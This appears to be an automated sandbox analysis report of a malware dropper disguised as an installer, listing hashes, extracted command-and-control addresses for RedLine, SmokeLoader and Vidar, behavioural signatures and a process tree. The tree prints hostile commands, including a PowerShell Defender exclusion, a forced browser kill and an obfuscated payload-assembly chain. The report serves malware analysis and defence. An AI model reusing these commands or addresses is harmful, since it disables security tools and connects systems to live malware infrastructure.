Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
02-12-2021 07:35
211202-je6zgsfge4 1010-09-2021 20:31
210910-za2rzaaeh3 1010-09-2021 19:40
210910-ydvmdsdffp 1010-09-2021 12:06
210910-n9s4bsdbep 1010-09-2021 05:37
210910-gbjcxahdh2 1009-09-2021 22:16
210909-17av7aghb7 1009-09-2021 22:12
210909-14mqksgha9 1009-09-2021 22:12
210909-14l42sgha8 1009-09-2021 22:11
210909-14e1qsgha7 1009-09-2021 22:11
210909-138lnacacn 10Analysis
-
max time kernel
36s -
max time network
1209s -
platform
windows10_x64 -
resource
win10-jp -
submitted
10-09-2021 05:37
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-jp
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-fr
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win7-de
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-en
Behavioral task
behavioral10
Sample
setup_x86_x64_install.exe
Resource
win10-de
General
-
Target
setup_x86_x64_install.exe
-
Size
4.3MB
-
MD5
6d18c8e8ab9051f7a70b89ff7bb0ec35
-
SHA1
265311e2afd9f59e824f4b77162cf3dfa278eb7e
-
SHA256
8fe6c86b038ce91a991fe6eb8a9b323bb37b554ff6b4e5c18de3fe52d4aedf6d
-
SHA512
249bf79dc90d4662b942c7eed2a7b7816b749f6d5f7bc190bba05f826fa143d0b44f58054d8649b8626884c5fcbd1cea8abd625dc701d44b7aaac84fc74e47ff
Malware Config
Extracted
http://shellloader.com/welcome
Extracted
redline
pab123
45.14.49.169:22411
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Extracted
vidar
40.5
706
https://gheorghip.tumblr.com/
-
profile_id
706
Signatures
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6996 3164 rundll32.exe 23 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7776 3164 rundll32.exe 23 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6932 3164 rUNdlL32.eXe 23 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral7/memory/1068-241-0x0000000004AD0000-0x0000000004AEF000-memory.dmp family_redline behavioral7/memory/1068-247-0x0000000004FA0000-0x0000000004FBE000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral7/files/0x000400000001ab5e-141.dat family_socelars behavioral7/files/0x000400000001ab5e-169.dat family_socelars -
Vidar Stealer 2 IoCs
resource yara_rule behavioral7/memory/1956-266-0x0000000000400000-0x0000000002BC5000-memory.dmp family_vidar behavioral7/memory/1956-264-0x0000000004830000-0x0000000004901000-memory.dmp family_vidar -
resource yara_rule behavioral7/files/0x000400000001ab4f-123.dat aspack_v212_v242 behavioral7/files/0x000400000001ab4f-125.dat aspack_v212_v242 behavioral7/files/0x000500000001ab4e-124.dat aspack_v212_v242 behavioral7/files/0x000500000001ab4e-128.dat aspack_v212_v242 behavioral7/files/0x000500000001ab4e-129.dat aspack_v212_v242 behavioral7/files/0x000400000001ab51-127.dat aspack_v212_v242 behavioral7/files/0x000400000001ab51-131.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 32 IoCs
pid Process 1772 setup_installer.exe 4952 setup_install.exe 1068 Thu21624565bb917a.exe 3108 Thu219d5fe8cf316.exe 1656 Thu21a1ef054cac78a.exe 1904 Thu2156de5489c19.exe 2200 Thu21df5caa1b78de6.exe 2460 Thu21b9847cb6727.exe 2740 Thu21b93295136197.exe 3956 Thu2164f292a11ce.exe 3064 Thu21568b0ab8.exe 1956 3792163.exe 4728 Thu214aaca5625.exe 3916 Thu214aaca5625.tmp 4592 Thu21b93295136197.tmp 4992 6289820.exe 3628 tmp9197_tmp.exe 1520 LzmwAqmV.exe 3304 4435822.exe 1308 SdBV60qR2.exe 5060 PublicDwlBrowser1100.exe 2700 46807GHF____.exe 592 2.exe 3292 setup.exe 4884 gdgame.exe 2264 DVORAK.exe 776 Setup.exe 5168 setup_2.exe 5252 3002.exe 5324 setup_2.tmp 5344 jhuuee.exe 5420 BearVpn 3.exe -
Loads dropped DLL 10 IoCs
pid Process 4952 setup_install.exe 4952 setup_install.exe 4952 setup_install.exe 4952 setup_install.exe 4952 setup_install.exe 4952 setup_install.exe 3916 Thu214aaca5625.tmp 4592 Thu21b93295136197.tmp 4592 Thu21b93295136197.tmp 5324 setup_2.tmp -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 8168 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce tmp9197_tmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" tmp9197_tmp.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Thu2156de5489c19.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Thu21b93295136197.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA tmp9197_tmp.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Setup.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 13 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 314 freegeoip.app 406 api.2ip.ua 16 ip-api.com 32 ipinfo.io 142 ipinfo.io 144 ipinfo.io 311 freegeoip.app 313 freegeoip.app 34 ipinfo.io 161 ip-api.com 316 freegeoip.app 407 api.2ip.ua 429 api.2ip.ua -
Drops file in Program Files directory 3 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\Visit.url Setup.exe File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe Setup.exe File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe Setup.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 16 IoCs
pid pid_target Process procid_target 4876 2200 WerFault.exe 102 5272 2200 WerFault.exe 102 5592 592 WerFault.exe 120 5660 2200 WerFault.exe 102 6000 3292 WerFault.exe 121 5164 2200 WerFault.exe 102 5740 3292 WerFault.exe 121 5444 2200 WerFault.exe 102 4876 3292 WerFault.exe 121 4920 3292 WerFault.exe 121 4876 3292 WerFault.exe 121 5900 2200 WerFault.exe 102 5380 2200 WerFault.exe 102 4928 3292 WerFault.exe 121 6240 3292 WerFault.exe 121 6364 4992 WerFault.exe 112 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu2164f292a11ce.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu2164f292a11ce.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu2164f292a11ce.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 7080 schtasks.exe 7124 schtasks.exe 5188 schtasks.exe 5384 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 4260 timeout.exe 4732 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 7816 taskkill.exe 6608 taskkill.exe 5464 taskkill.exe 6976 taskkill.exe 4844 taskkill.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 3792163.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 3792163.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 6448 PING.EXE 7320 PING.EXE 6296 PING.EXE -
Script User-Agent 5 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 33 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 34 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 36 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 52 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 143 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 3956 Thu2164f292a11ce.exe 3956 Thu2164f292a11ce.exe 1012 powershell.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 4876 WerFault.exe 2636 Process not Found 2636 Process not Found 2636 Process not Found 2636 Process not Found 2636 Process not Found 2636 Process not Found 2636 Process not Found 2636 Process not Found 2636 Process not Found 2636 Process not Found 2636 Process not Found 2636 Process not Found 2636 Process not Found 2636 Process not Found 5272 WerFault.exe 5272 WerFault.exe 5272 WerFault.exe 5272 WerFault.exe 5272 WerFault.exe 5272 WerFault.exe 5272 WerFault.exe 5272 WerFault.exe 5272 WerFault.exe 5272 WerFault.exe 5272 WerFault.exe 5272 WerFault.exe 5272 WerFault.exe 5272 WerFault.exe 5272 WerFault.exe 5272 WerFault.exe 5272 WerFault.exe 5272 WerFault.exe 5272 WerFault.exe 5272 WerFault.exe 5272 WerFault.exe 5272 WerFault.exe 2636 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3956 Thu2164f292a11ce.exe -
Suspicious use of AdjustPrivilegeToken 57 IoCs
description pid Process Token: SeCreateTokenPrivilege 1656 Thu21a1ef054cac78a.exe Token: SeAssignPrimaryTokenPrivilege 1656 Thu21a1ef054cac78a.exe Token: SeLockMemoryPrivilege 1656 Thu21a1ef054cac78a.exe Token: SeIncreaseQuotaPrivilege 1656 Thu21a1ef054cac78a.exe Token: SeMachineAccountPrivilege 1656 Thu21a1ef054cac78a.exe Token: SeTcbPrivilege 1656 Thu21a1ef054cac78a.exe Token: SeSecurityPrivilege 1656 Thu21a1ef054cac78a.exe Token: SeTakeOwnershipPrivilege 1656 Thu21a1ef054cac78a.exe Token: SeLoadDriverPrivilege 1656 Thu21a1ef054cac78a.exe Token: SeSystemProfilePrivilege 1656 Thu21a1ef054cac78a.exe Token: SeSystemtimePrivilege 1656 Thu21a1ef054cac78a.exe Token: SeProfSingleProcessPrivilege 1656 Thu21a1ef054cac78a.exe Token: SeIncBasePriorityPrivilege 1656 Thu21a1ef054cac78a.exe Token: SeCreatePagefilePrivilege 1656 Thu21a1ef054cac78a.exe Token: SeCreatePermanentPrivilege 1656 Thu21a1ef054cac78a.exe Token: SeBackupPrivilege 1656 Thu21a1ef054cac78a.exe Token: SeRestorePrivilege 1656 Thu21a1ef054cac78a.exe Token: SeShutdownPrivilege 1656 Thu21a1ef054cac78a.exe Token: SeDebugPrivilege 1656 Thu21a1ef054cac78a.exe Token: SeAuditPrivilege 1656 Thu21a1ef054cac78a.exe Token: SeSystemEnvironmentPrivilege 1656 Thu21a1ef054cac78a.exe Token: SeChangeNotifyPrivilege 1656 Thu21a1ef054cac78a.exe Token: SeRemoteShutdownPrivilege 1656 Thu21a1ef054cac78a.exe Token: SeUndockPrivilege 1656 Thu21a1ef054cac78a.exe Token: SeSyncAgentPrivilege 1656 Thu21a1ef054cac78a.exe Token: SeEnableDelegationPrivilege 1656 Thu21a1ef054cac78a.exe Token: SeManageVolumePrivilege 1656 Thu21a1ef054cac78a.exe Token: SeImpersonatePrivilege 1656 Thu21a1ef054cac78a.exe Token: SeCreateGlobalPrivilege 1656 Thu21a1ef054cac78a.exe Token: 31 1656 Thu21a1ef054cac78a.exe Token: 32 1656 Thu21a1ef054cac78a.exe Token: 33 1656 Thu21a1ef054cac78a.exe Token: 34 1656 Thu21a1ef054cac78a.exe Token: 35 1656 Thu21a1ef054cac78a.exe Token: SeDebugPrivilege 1012 powershell.exe Token: SeDebugPrivilege 3064 Thu21568b0ab8.exe Token: SeDebugPrivilege 3108 rnyuf.exe Token: SeDebugPrivilege 1904 Thu2156de5489c19.exe Token: SeDebugPrivilege 4992 6289820.exe Token: SeDebugPrivilege 592 2.exe Token: SeRestorePrivilege 4876 WerFault.exe Token: SeBackupPrivilege 4876 WerFault.exe Token: SeDebugPrivilege 4876 WerFault.exe Token: SeDebugPrivilege 5060 PublicDwlBrowser1100.exe Token: SeShutdownPrivilege 2636 Process not Found Token: SeCreatePagefilePrivilege 2636 Process not Found Token: SeDebugPrivilege 2264 DVORAK.exe Token: SeShutdownPrivilege 2636 Process not Found Token: SeCreatePagefilePrivilege 2636 Process not Found Token: SeShutdownPrivilege 2636 Process not Found Token: SeCreatePagefilePrivilege 2636 Process not Found Token: SeDebugPrivilege 5272 WerFault.exe Token: SeDebugPrivilege 5420 BearVpn 3.exe Token: SeShutdownPrivilege 2636 Process not Found Token: SeCreatePagefilePrivilege 2636 Process not Found Token: SeShutdownPrivilege 2636 Process not Found Token: SeCreatePagefilePrivilege 2636 Process not Found -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4592 Thu21b93295136197.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2816 wrote to memory of 1772 2816 setup_x86_x64_install.exe 81 PID 2816 wrote to memory of 1772 2816 setup_x86_x64_install.exe 81 PID 2816 wrote to memory of 1772 2816 setup_x86_x64_install.exe 81 PID 1772 wrote to memory of 4952 1772 setup_installer.exe 82 PID 1772 wrote to memory of 4952 1772 setup_installer.exe 82 PID 1772 wrote to memory of 4952 1772 setup_installer.exe 82 PID 4952 wrote to memory of 2732 4952 setup_install.exe 85 PID 4952 wrote to memory of 2732 4952 setup_install.exe 85 PID 4952 wrote to memory of 2732 4952 setup_install.exe 85 PID 4952 wrote to memory of 2668 4952 setup_install.exe 86 PID 4952 wrote to memory of 2668 4952 setup_install.exe 86 PID 4952 wrote to memory of 2668 4952 setup_install.exe 86 PID 4952 wrote to memory of 912 4952 setup_install.exe 87 PID 4952 wrote to memory of 912 4952 setup_install.exe 87 PID 4952 wrote to memory of 912 4952 setup_install.exe 87 PID 4952 wrote to memory of 5024 4952 setup_install.exe 88 PID 4952 wrote to memory of 5024 4952 setup_install.exe 88 PID 4952 wrote to memory of 5024 4952 setup_install.exe 88 PID 4952 wrote to memory of 872 4952 setup_install.exe 89 PID 4952 wrote to memory of 872 4952 setup_install.exe 89 PID 4952 wrote to memory of 872 4952 setup_install.exe 89 PID 4952 wrote to memory of 1016 4952 setup_install.exe 92 PID 4952 wrote to memory of 1016 4952 setup_install.exe 92 PID 4952 wrote to memory of 1016 4952 setup_install.exe 92 PID 2732 wrote to memory of 1012 2732 cmd.exe 90 PID 2732 wrote to memory of 1012 2732 cmd.exe 90 PID 2732 wrote to memory of 1012 2732 cmd.exe 90 PID 4952 wrote to memory of 1040 4952 setup_install.exe 91 PID 4952 wrote to memory of 1040 4952 setup_install.exe 91 PID 4952 wrote to memory of 1040 4952 setup_install.exe 91 PID 912 wrote to memory of 1068 912 cmd.exe 109 PID 912 wrote to memory of 1068 912 cmd.exe 109 PID 912 wrote to memory of 1068 912 cmd.exe 109 PID 4952 wrote to memory of 1264 4952 setup_install.exe 108 PID 4952 wrote to memory of 1264 4952 setup_install.exe 108 PID 4952 wrote to memory of 1264 4952 setup_install.exe 108 PID 4952 wrote to memory of 1392 4952 setup_install.exe 93 PID 4952 wrote to memory of 1392 4952 setup_install.exe 93 PID 4952 wrote to memory of 1392 4952 setup_install.exe 93 PID 4952 wrote to memory of 1592 4952 setup_install.exe 107 PID 4952 wrote to memory of 1592 4952 setup_install.exe 107 PID 4952 wrote to memory of 1592 4952 setup_install.exe 107 PID 5024 wrote to memory of 1656 5024 cmd.exe 106 PID 5024 wrote to memory of 1656 5024 cmd.exe 106 PID 5024 wrote to memory of 1656 5024 cmd.exe 106 PID 2668 wrote to memory of 3108 2668 cmd.exe 105 PID 2668 wrote to memory of 3108 2668 cmd.exe 105 PID 1392 wrote to memory of 1904 1392 cmd.exe 104 PID 1392 wrote to memory of 1904 1392 cmd.exe 104 PID 4952 wrote to memory of 2056 4952 setup_install.exe 103 PID 4952 wrote to memory of 2056 4952 setup_install.exe 103 PID 4952 wrote to memory of 2056 4952 setup_install.exe 103 PID 1592 wrote to memory of 2200 1592 cmd.exe 102 PID 1592 wrote to memory of 2200 1592 cmd.exe 102 PID 1592 wrote to memory of 2200 1592 cmd.exe 102 PID 1040 wrote to memory of 2460 1040 cmd.exe 95 PID 1040 wrote to memory of 2460 1040 cmd.exe 95 PID 4952 wrote to memory of 4664 4952 setup_install.exe 94 PID 4952 wrote to memory of 4664 4952 setup_install.exe 94 PID 4952 wrote to memory of 4664 4952 setup_install.exe 94 PID 1016 wrote to memory of 2740 1016 cmd.exe 96 PID 1016 wrote to memory of 2740 1016 cmd.exe 96 PID 1016 wrote to memory of 2740 1016 cmd.exe 96 PID 4952 wrote to memory of 4908 4952 setup_install.exe 97
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1772 -
C:\Users\Admin\AppData\Local\Temp\7zSCE6B3B74\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSCE6B3B74\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4952 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1012
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu219d5fe8cf316.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Users\Admin\AppData\Local\Temp\7zSCE6B3B74\Thu219d5fe8cf316.exeThu219d5fe8cf316.exe5⤵
- Executes dropped EXE
PID:3108 -
C:\ProgramData\6289820.exe"C:\ProgramData\6289820.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4992 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4992 -s 19367⤵
- Program crash
PID:6364
-
-
-
C:\ProgramData\4435822.exe"C:\ProgramData\4435822.exe"6⤵
- Executes dropped EXE
PID:3304
-
-
C:\ProgramData\3922585.exe"C:\ProgramData\3922585.exe"6⤵PID:5672
-
-
C:\ProgramData\4359709.exe"C:\ProgramData\4359709.exe"6⤵PID:5944
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21624565bb917a.exe4⤵
- Suspicious use of WriteProcessMemory
PID:912 -
C:\Users\Admin\AppData\Local\Temp\7zSCE6B3B74\Thu21624565bb917a.exeThu21624565bb917a.exe5⤵
- Executes dropped EXE
PID:1068
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21a1ef054cac78a.exe4⤵
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Users\Admin\AppData\Local\Temp\7zSCE6B3B74\Thu21a1ef054cac78a.exeThu21a1ef054cac78a.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1656 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:6336
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:6976
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2164f292a11ce.exe4⤵PID:872
-
C:\Users\Admin\AppData\Local\Temp\7zSCE6B3B74\Thu2164f292a11ce.exeThu2164f292a11ce.exe5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3956
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21b9847cb6727.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1040 -
C:\Users\Admin\AppData\Local\Temp\7zSCE6B3B74\Thu21b9847cb6727.exeThu21b9847cb6727.exe5⤵
- Executes dropped EXE
PID:2460
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21b93295136197.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1016 -
C:\Users\Admin\AppData\Local\Temp\7zSCE6B3B74\Thu21b93295136197.exeThu21b93295136197.exe5⤵
- Executes dropped EXE
PID:2740 -
C:\Users\Admin\AppData\Local\Temp\is-7SQ7L.tmp\Thu21b93295136197.tmp"C:\Users\Admin\AppData\Local\Temp\is-7SQ7L.tmp\Thu21b93295136197.tmp" /SL5="$20220,138429,56832,C:\Users\Admin\AppData\Local\Temp\7zSCE6B3B74\Thu21b93295136197.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of FindShellTrayWindow
PID:4592 -
C:\Users\Admin\AppData\Local\Temp\is-12PUA.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-12PUA.tmp\Setup.exe" /Verysilent7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
PID:776 -
C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"8⤵PID:6440
-
C:\Users\Admin\AppData\Local\Temp\BSKR.exe"C:\Users\Admin\AppData\Local\Temp\BSKR.exe"9⤵PID:6636
-
C:\Users\Admin\AppData\Local\Temp\BSKR.exeC:\Users\Admin\AppData\Local\Temp\BSKR.exe10⤵PID:4648
-
-
C:\Users\Admin\AppData\Local\Temp\BSKR.exeC:\Users\Admin\AppData\Local\Temp\BSKR.exe10⤵PID:5668
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser144.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser144.exe"9⤵PID:5212
-
C:\ProgramData\3792163.exe"C:\ProgramData\3792163.exe"10⤵
- Executes dropped EXE
- Modifies system certificate store
PID:1956
-
-
C:\ProgramData\3947667.exe"C:\ProgramData\3947667.exe"10⤵PID:6556
-
-
C:\ProgramData\6937409.exe"C:\ProgramData\6937409.exe"10⤵PID:5108
-
-
C:\ProgramData\590723.exe"C:\ProgramData\590723.exe"10⤵PID:4680
-
-
-
C:\Users\Admin\AppData\Local\Temp\Mortician.exe"C:\Users\Admin\AppData\Local\Temp\Mortician.exe"9⤵PID:6860
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c cmd < Cerchia.vsdx10⤵PID:6304
-
C:\Windows\SysWOW64\cmd.execmd11⤵PID:5384
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^JdxmflaMoKJKGKEonRKIDlCuNBztuuxobvTVXbusdtKZTUcnQFZrvdHmOhLNQgGwfAjlQJkqLaammCjTuVhBisMuOxuJLaA$" Attesa.vsdx12⤵PID:1440
-
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comImpedire.exe.com I12⤵PID:7244
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I13⤵PID:7476
-
-
-
C:\Windows\SysWOW64\PING.EXEping localhost12⤵
- Runs ping.exe
PID:7320
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\foradvertising.exe"C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" /wws19⤵PID:5752
-
